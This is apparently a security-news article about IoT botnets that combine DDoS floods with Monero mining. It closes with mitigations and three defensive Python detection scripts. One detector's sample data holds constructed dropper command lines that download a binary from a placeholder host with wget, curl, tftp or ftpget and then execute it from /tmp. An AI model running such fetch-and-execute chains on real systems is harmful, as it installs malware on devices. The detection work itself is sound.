A steady stream of recent reports describes malware turning enterprise routers, smart devices and white-label Linux boxes into tools that flood websites with traffic while quietly mining cryptocurrency in the background.
Not long ago these operators targeted laptops and desktops; now they go straight for networking gear. The motive is profit. They get in through outdated firmware, factory-default passwords and known CVEs left unpatched for too long.
The pace is increasing faster than most IT teams can respond. Hidden inside ordinary data streams, these infections do double duty: each compromised node is both a hammer for DDoS and a pickaxe for mining.
The Threat Landscape Moves Closer to Infrastructure
In 2025, Layer 3 and Layer 4 attacks rose by nearly 170%, peaking at close to 30 Tbps, according to Radware's annual threat review. Over the same twelve months, attacks driven by internet-connected devices grew by more than 80%. One such outbreak, powered by hacked smart devices, produced a 5.6 Tbps flood near the end of 2024.
That record did not stand for long. Security teams are no longer patching isolated flare-ups; they face an organised operation that exploits weak points in everyday technology across businesses, cities and public services.
A single router can now serve two criminal goals at once. Rather than choosing one monetisation method, operators load both onto the same infected device.
One process quietly floods targets with junk traffic while another mines cryptocurrency. These blended threats turn basic hardware into dual-purpose tools at no extra cost. Running parallel schemes on one device was rare a few years ago; now it is routine, steady and largely invisible.
CondiBot Variant Emerges as Modified Mirai DDoS Tool
In early March 2026, researchers at Eclypsium identified two previously unseen malware families aimed at Linux-based networking devices; their report followed on March 15. One of them carries familiar traits: it descends from CondiBot, itself a Mirai offshoot, but now operates well beyond its original scope.
Unlike earlier CondiBot builds, which targeted a single vendor's hardware, this version is a general-purpose Linux bot compiled for many architectures (ARM variants through ARM7, MIPS, and 32-bit and 64-bit x86), so it fits devices from home routers to industrial controllers.
Embedded in the binary is the string "QTXBOT", which had not appeared in previous analyses of Condi threats. It may indicate that someone has privately modified the original code and spun off a new branch without public notice.
What sets this malware apart is that it rotates through wget, curl, tftp and ftpget to fetch its payload, so it still succeeds on minimal systems that lack some of those tools. Once installed it starts quietly, prevents the device from restarting, and contacts a remote server for orders.
It does not share the device: it kills rival bots already running there. Fortinet devices appear on its target list, according to Eclypsium. Networking gear of this kind is now in the sights of both state-backed and profit-driven attackers.
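As an added illustration (not code from Eclypsium or from this page), here is a small Python hunting rule for the loader behaviour just described: a process command line that chains wget, curl, tftp and ftpget as fallbacks, stages the payload under /tmp and then executes it. The process records are constructed samples; the address 198.51.100.20 and the file names are placeholders, not indicators from the report.

```python
import re
from typing import List, Set, Tuple

# The fetch tools the page says the CondiBot loader rotates through.
FETCH_TOOLS = ("wget", "curl", "tftp", "ftpget")

# Constructed process command lines (not real telemetry). 198.51.100.20 is a
# documentation address standing in for a payload host.
SAMPLE_CMDLINES = [
    "apt-get update && apt-get install -y curl",
    ("cd /tmp; wget http://198.51.100.20/arm7 -O .x || curl -o .x http://198.51.100.20/arm7"
     " || tftp -g -r arm7 -l .x 198.51.100.20 || ftpget -u anonymous 198.51.100.20 .x arm7;"
     " chmod +x .x; ./.x"),
    "curl -fsSL https://example.com/install.sh -o /home/ops/install.sh",
    "ftpget -u admin -p admin 198.51.100.20 /var/tmp/.m mips; chmod 777 /var/tmp/.m; /var/tmp/.m",
]

# A tool name as its own token (not part of a path or a longer word).
TOOL_RE = re.compile(r"(?<![\w/.-])(" + "|".join(FETCH_TOOLS) + r")(?![\w.-])")
# World-writable staging directories commonly used by IoT droppers.
STAGING_RE = re.compile(r"/(?:var/)?tmp(?:/|\b)|/dev/shm")
# chmod +x, or an octal mode whose owner digit has the execute bit (contains a 7).
CHMOD_EXEC_RE = re.compile(r"chmod\s+(?:\+x|[0-7]*7)\b")
# A command that starts a file from the staging dir or the current dir after ; & or |.
EXEC_FROM_STAGING_RE = re.compile(r"[;&|]\s*(?:\./|/(?:var/)?tmp/|/dev/shm/)\S+")


def indicators(cmd: str) -> Set[str]:
    """Return the set of dropper indicators present in one command line."""
    found: Set[str] = set()
    tools = {m.group(1) for m in TOOL_RE.finditer(cmd)}
    if len(tools) >= 2:
        found.add("multi_tool_fetch")      # several downloaders chained as fallbacks
    if tools and STAGING_RE.search(cmd):
        found.add("drop_in_staging")       # payload written under /tmp, /var/tmp or /dev/shm
    if CHMOD_EXEC_RE.search(cmd):
        found.add("chmod_exec")
    if EXEC_FROM_STAGING_RE.search(cmd):
        found.add("exec_from_staging")
    return found


def is_dropper_like(cmd: str) -> bool:
    """Multi-tool fallback alone is strong; otherwise require drop + execute together."""
    ind = indicators(cmd)
    return "multi_tool_fetch" in ind or {"drop_in_staging", "exec_from_staging"} <= ind


def hunt(cmdlines: List[str]) -> List[Tuple[str, List[str]]]:
    """Return (command line, sorted indicators) for every suspicious record."""
    return [(c, sorted(indicators(c))) for c in cmdlines if is_dropper_like(c)]


if __name__ == "__main__":
    for cmd, why in hunt(SAMPLE_CMDLINES):
        print(", ".join(why), "<-", cmd[:70])
```

A single curl to a home directory is left alone on purpose; the rule only fires on the fallback chain itself or on the drop-and-execute pair, which keeps ordinary install scripts out of the alert queue.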
Monaco Tool Uses Go for SSH Attacks and Mining Monero
The second find from Eclypsium's investigation is Monaco, a Go-based tool for SSH scanning and Monero mining, built with Go 1.24.0 and compiled on 11 February 2025. Unlike CondiBot, it focuses on continuous credential theft and quiet coin mining rather than large-scale attacks.
Monaco hunts for exposed SSH services on the internet and logs in with a built-in list of credentials. Once inside, it immediately copies itself to /tmp/monaco, kills any other mining scripts so it does not share resources, and adjusts CPU settings on the fly to squeeze out maximum mining performance.
Mining runs through XMRig or its variant XMRigCC, with proceeds sent to MoneroOcean's pool. Every working username and password it finds is reported back over raw TCP to direct the next round of break-ins, feeding the cycle.
Built for x86-64, ARM32, ARM64 and both big- and little-endian MIPS, it runs on servers, home routers, smart devices and Juniper networking hardware. Its traffic is split across ports: port 80 serves files from an Apache web server, port 3333 carries mining traffic, and separate control channels run on 12345 and 12346, a clear division of duties.
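The credential-list scanning described above leaves a recognisable trail in sshd logs. As an added example (not code from Eclypsium or from this page), the following Python detector reads traditional-format auth log lines, keeps a sliding window of failures per source address, and raises a high-priority alert when a source that has been spraying credentials then logs in successfully. The log lines are constructed; 198.51.100.7 and 203.0.113.9 are documentation addresses, and the year is assumed because syslog omits it.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, List, NamedTuple, Optional, Set, Tuple

# Constructed sshd syslog lines (no year in the timestamp). Not real Eclypsium data.
SAMPLE_AUTH_LOG = """\
Mar  6 02:14:01 edge sshd[2201]: Failed password for root from 198.51.100.7 port 41022 ssh2
Mar  6 02:14:03 edge sshd[2203]: Failed password for root from 198.51.100.7 port 41030 ssh2
Mar  6 02:14:05 edge sshd[2205]: Failed password for invalid user admin from 198.51.100.7 port 41044 ssh2
Mar  6 02:14:06 edge sshd[2207]: Failed password for invalid user pi from 198.51.100.7 port 41052 ssh2
Mar  6 02:14:08 edge sshd[2209]: Failed password for invalid user ubnt from 198.51.100.7 port 41060 ssh2
Mar  6 02:14:11 edge sshd[2211]: Accepted password for root from 198.51.100.7 port 41071 ssh2
Mar  6 02:20:40 edge sshd[2290]: Failed password for ops from 203.0.113.9 port 50112 ssh2
Mar  6 02:20:55 edge sshd[2292]: Accepted publickey for ops from 203.0.113.9 port 50118 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)


class Event(NamedTuple):
    ts: datetime
    result: str
    method: str
    user: str
    ip: str


def parse_event(line: str, year: int = 2026) -> Optional[Event]:
    """Parse one sshd auth line; the year is an assumption since syslog omits it."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {' '.join(m['ts'].split())}", "%Y %b %d %H:%M:%S")
    return Event(ts, m["result"], m["method"], m["user"], m["ip"])


def detect(log_text: str, threshold: int = 4,
           window: timedelta = timedelta(minutes=5)) -> List[Tuple[str, str, str]]:
    """Return (alert, source_ip, detail) tuples.

    'spray' fires when a source reaches `threshold` failures inside `window`;
    'success_after_spray' fires when that same source then logs in, which is the
    moment a Monaco-style scanner turns a guessed credential into a foothold.
    """
    recent: Dict[str, Deque[datetime]] = defaultdict(deque)
    users: Dict[str, Set[str]] = defaultdict(set)
    alerts: List[Tuple[str, str, str]] = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev is None:
            continue
        q = recent[ev.ip]
        while q and ev.ts - q[0] > window:     # slide the window forward
            q.popleft()
        if ev.result == "Failed":
            q.append(ev.ts)
            users[ev.ip].add(ev.user)
            if len(q) == threshold:            # alert once, as the threshold is crossed
                alerts.append(("spray", ev.ip,
                               "users tried: " + ", ".join(sorted(users[ev.ip]))))
        elif len(q) >= threshold:              # an Accepted while still inside a spray
            alerts.append(("success_after_spray", ev.ip, f"{ev.user} via {ev.method}"))
    return alerts


if __name__ == "__main__":
    for kind, ip, detail in detect(SAMPLE_AUTH_LOG):
        print(f"{kind:22} {ip:15} {detail}")
```

The second source in the sample (one typo followed by a key-based login) produces nothing, which is the behaviour you want: the signal is the combination of volume, rotating usernames and a password-based success, not a single failure.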
Aisuru and Kimwolf Set New Botnet Records
CondiBot and Monaco may be the newest names on the threat list, but the real shift in botnet scale came earlier from Aisuru and Kimwolf. The 31.4 Tbps DDoS attack struck in February 2026, in a year already packed with near-record attacks; 2025 alone saw 47.1 million DDoS events worldwide. Aisuru's growth exploded after its operators compromised a Totolink router firmware update server, and April was the turning point.
They redirected the update download location to a malicious script. One change, one breach, and more than 100,000 devices were pulled in during a single push.
The compromised hardware is mostly everyday consumer gear: routers from Totolink, T-Mobile, Zyxel, D-Link and Linksys, cameras from A-MTK and D-Link's DCS-3411, and recorders from LILIN, UNIMO, TBK and Shenzhen TVT.
From this base Aisuru launches fast single-vector floods of UDP, TCP or GRE traffic in mid-sized packets of 540 to 750 bytes, a size that balances packet rate against bandwidth. When packet rates exceed 4 billion per second, line cards inside large network devices stall and drop off the internal fabric, taking unrelated traffic down with them.
Enterprise, municipal and state networks now host the Kimwolf strain, which reaches them over covert relay paths that change form without warning and slip past standard inspection.
One common entry point is unapproved streaming boxes running Android TV: these devices often arrive pre-compromised or with backdoors already open. Once plugged into an office network, they hand attackers a command shell, like keys left under the mat, from which they can move unseen across other machines.
RondoDox Links Many CVEs to a Single Botnet
RondoDox is notable not just for its growth but for changing how threats spread. When FortiGuard Labs analysed the code around June 2025, TBK DVRs and Four-Faith routers were being hit through CVE-2024-3721 and CVE-2024-12856. By December 2025 everything had changed: its exploit range had expanded sharply.
Then, in early 2026, CERT-In issued a critical advisory: RondoDox was now exploiting fresh vulnerabilities not only in smart devices and networking boxes but also in Next.js server functions and content management systems.
Its attack traffic is disguised as gaming traffic, mimicking platforms such as Minecraft, Roblox, Discord and Fortnite so it blends into the background rather than standing out. It uses HTTP, TCP and UDP floods to disrupt targets with few clear warning signs.
Another twist, unlike older botnets built on server farms, is its use of residential IP addresses. Because the source looks like an ordinary home user, defences often fail to respond. Infected machines also run hidden mining software, backdoors and modified Mirai code, so cleanup means tackling several threats at once, each hiding behind everyday online behaviour.
Prometei Revives Monero Mining Efforts
A fresh surge in Prometei attacks caught the attention of Palo Alto Networks' Unit 42 in March 2025. New families emerge, but older threats still carry weight: the Linux version of this malware sharply ramped up its operations. Once a system is infected, the operators gain remote control, mine Monero and steal login credentials.
Attackers rely on shared infrastructure that helps them stay hidden inside corporate networks for months; persistence matters more than speed here.
Like many before it, Prometei creeps back quietly, not loud like ransomware that locks data and demands attention. The theft is slow: power is wasted and processors strain under a silent load, and months can pass unnoticed where systems lack deep inspection tools, while profits pile up far away and the machines hum along unaware.
Methods, Movement and Evasion
Every known campaign shares certain methods. Several weak points are exploited at once, such as factory passwords, outdated firmware and leftover admin tools exposed online. Rather than relying on a single tool, operators switch between small programs so the campaign keeps working even when basic systems are wiped clean.
What persists are changes made deep in device firmware, the kind that survive reboots, fresh installs and sometimes even replacement storage drives. Once a network falls, those devices become hidden bases from which attackers move quietly across separate network zones, bridging office IT and industrial gear to spy or strike later.
Mitigation Recommendations
Security teams should prioritize the following defensive measures against these active campaigns:
- Update the firmware on every device. Old code in border gateways, recorders and internet-connected cameras opens doors that should stay closed, and these are exactly the gaps the RondoDox, Aisuru and CondiBot operators exploit. Inventory each device, then replace outdated firmware before an attacker finds it.
- Remove default credentials from every internet-exposed device and move SSH access from passwords to keys. Each system should reject factory-set credentials as soon as it is deployed, and only authorised keys should grant entry. This blunts the automated credential spraying seen from Monaco.
- Look for anomalous behaviour below the operating system: use tooling that inspects firmware-level activity, where regular security tools often have no visibility.
- Watch outbound traffic closely. Unexpected connections to MoneroOcean, traffic to IP addresses such as 8.222.206.6, and unusual activity on ports 3333, 12345 or 12346 are indicators seen in Monaco's infrastructure and deserve a second look.
- Segment the network. Keep smart devices apart from business systems so that attackers such as Kimwolf and Aisuru cannot move laterally from weak endpoints into core areas. When one zone is hit, the rest stays shielded; the layout itself becomes a barrier, slowing intruders without extra tools and limiting spread when a threat gets in.
- Alongside BGP Flowspec, deploy DDoS defences that respond automatically when attacks hit, blocking malicious traffic with rules pushed into the routing layer rather than waiting for manual action. Detection must already be watching every packet's shape and size; classification then separates noise from real threats using live patterns from known botnets; traceback leaves a trail so sources can be pinned down later. Test regularly, not once, and use fresh attack data each round to confirm the defences still hold.
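As an added example (not code from Eclypsium or from this site), the following Python script turns the egress indicators in the list above, and the Monaco port layout described earlier, into a simple hunt over connection and DNS records: it flags internal hosts that contact the listed IP address, the listed ports, or a MoneroOcean hostname. The logs are constructed, simplified Zeek-style TSV; the internal 10.0.5.x hosts, 203.0.113.44 and 93.184.216.34 are placeholders, and only the IP, the ports and the pool name come from the page.

```python
import csv
import io
from typing import Dict, List, Tuple

# Indicators drawn from the Monaco description on this page: its host/C2 IP, the ports
# it splits traffic across, and the MoneroOcean pool. A starting point, not a full list.
IOC_IPS = {"8.222.206.6"}
IOC_PORTS = {3333: "stratum mining traffic", 12345: "Monaco control channel",
             12346: "Monaco control channel"}
IOC_DOMAIN_SUBSTRINGS = ("moneroocean",)

# Constructed, simplified Zeek-style logs (tab separated, header row); not real captures.
# 10.0.5.x are internal hosts; 203.0.113.44 and 93.184.216.34 are placeholders.
CONN_LOG = """\
ts\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\torig_bytes\tresp_bytes
1773000000.10\t10.0.5.21\t51234\t8.222.206.6\t80\ttcp\t312\t88412
1773000001.55\t10.0.5.21\t51240\t8.222.206.6\t12345\ttcp\t1840\t620
1773000005.02\t10.0.5.21\t51250\t203.0.113.44\t3333\ttcp\t52100\t9040
1773000007.77\t10.0.5.30\t44010\t93.184.216.34\t443\ttcp\t2100\t15300
1773000009.00\t10.0.5.21\t51260\t203.0.113.44\t12346\ttcp\t402\t110
"""
DNS_LOG = """\
ts\tid.orig_h\tquery
1773000004.90\t10.0.5.21\tgulf.moneroocean.stream
1773000007.00\t10.0.5.30\texample.com
"""


def _rows(tsv: str) -> List[Dict[str, str]]:
    return list(csv.DictReader(io.StringIO(tsv), delimiter="\t"))


def conn_reasons(row: Dict[str, str]) -> List[str]:
    """Why one outbound connection record matches the Monaco indicators, if at all."""
    reasons: List[str] = []
    dst, port = row["id.resp_h"], int(row["id.resp_p"])
    if dst in IOC_IPS:
        reasons.append(f"known IOC address {dst}")
    if port in IOC_PORTS:
        reasons.append(f"port {port} ({IOC_PORTS[port]})")
    return reasons


def dns_reasons(row: Dict[str, str]) -> List[str]:
    """Flag lookups of the mining pool; substring match catches regional pool hosts."""
    q = row["query"].lower()
    return [f"DNS lookup of {q}" for s in IOC_DOMAIN_SUBSTRINGS if s in q]


def hunt(conn_log: str, dns_log: str) -> Dict[str, List[Tuple[str, str]]]:
    """Map each internal host to (timestamp, finding) pairs; hosts with no hit are omitted."""
    findings: Dict[str, List[Tuple[str, str]]] = {}
    for row in _rows(conn_log):
        reasons = conn_reasons(row)
        if reasons:
            findings.setdefault(row["id.orig_h"], []).append(
                (row["ts"], "; ".join(reasons) + f" -> {row['id.resp_h']}:{row['id.resp_p']}"))
    for row in _rows(dns_log):
        for r in dns_reasons(row):
            findings.setdefault(row["id.orig_h"], []).append((row["ts"], r))
    for host in findings:
        findings[host].sort()             # chronological order per host
    return findings


if __name__ == "__main__":
    for host, hits in hunt(CONN_LOG, DNS_LOG).items():
        print(host)
        for ts, why in hits:
            print("  ", ts, why)
```

Port-only hits need a second look before escalation, since 3333 and 12345 are also used by legitimate software; a host that combines a port hit with the pool lookup or the listed address, as 10.0.5.21 does in the sample, is the one to isolate first. DNS matching only works where resolution is visible to the sensor, so pair this with the segmentation and egress filtering above.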
These campaigns are broad and layered, and their goals are split between reach and profit. What is now clear in security work is that the network edge is no longer just a wall; it is where the fight starts. Devices left unmonitored quietly help the intruders.
Site: thecybrdef.com
What makes CondiBot dangerous is that it runs on many architectures (ARM, MIPS, x86 and x86_64), covering nearly every Linux-powered device, and it wipes out other malware already present to take full control. Monaco arrives alongside it through weak SSH logins and works two angles at once: further credential cracking and XMRig mining for Monero. One machine, two revenue streams; control spreads fast when both tools operate across devices.